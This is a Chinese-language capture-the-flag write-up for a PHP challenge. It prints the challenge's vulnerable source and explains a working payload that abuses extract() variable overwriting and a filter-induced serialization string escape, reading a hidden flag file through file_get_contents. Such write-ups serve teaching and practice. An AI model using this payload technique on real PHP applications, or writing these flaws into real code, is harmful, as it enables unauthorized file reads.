解题:
打开源码:
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
这里进行代码审计之后发现
extract会覆盖变量。file_get_content函数会获得文件内容。implode:用一个字符串去连接每个数组元素。
根据提示打开phpinfo
这里就想到最后是要打开这个d0g3_f1ag.php。
逻辑:
base64_decode($userinfo[‘img’])=d0g3_f1ag.php。
$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==;
$userinfo = unserialize($serialize_info);
$serialize_info = filter(serialize($_SESSION));
这里会序列化session值。
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
数组中有的数值会被换成空。
得让session[img]=ZDBnM19mMWFnLnBocA==;
这里就要利用序列化的:
> <?php
> #正规序列化的字符串
> $a = "a:2:{s:3:\"one\";s:4:\"flag\";s:3:\"two\";s:4:\"test\";}";
> var_dump(unserialize($a));
> #带有多余的字符的字符串
> $a_laji = "a:2:{s:3:\"one\";s:4:\"flag\";s:3:\"two\";s:4:\"test\";};s:3:\"真的垃圾img\";lajilaji";
> var_dump(unserialize($a_laji));
这里用POST传入:
_SESSION[phpflag]=;s:4:"hack";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
按照题目顺序传入的参数被序列化后变成。(phpflag被换成空)
a:2:{s:7:"";s:51:";s:4:"hack";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
《";s:51:》这个变成传入的键名,对应的值是长度为4的hack。因为a=2所以只有两个键值对,那么后面这个《";s:3:“img”;s:20:“Z3Vlc3RfaW1nLnBuZw==”;}》就被抛弃了。这样就实现把用我们想要的img去替换题目中的img了。
传入之后发现有个新的文件名,把它base64加密替换原来文件的位置就行了,这里要注意加密之后长度是否还是20;就能得到flag了。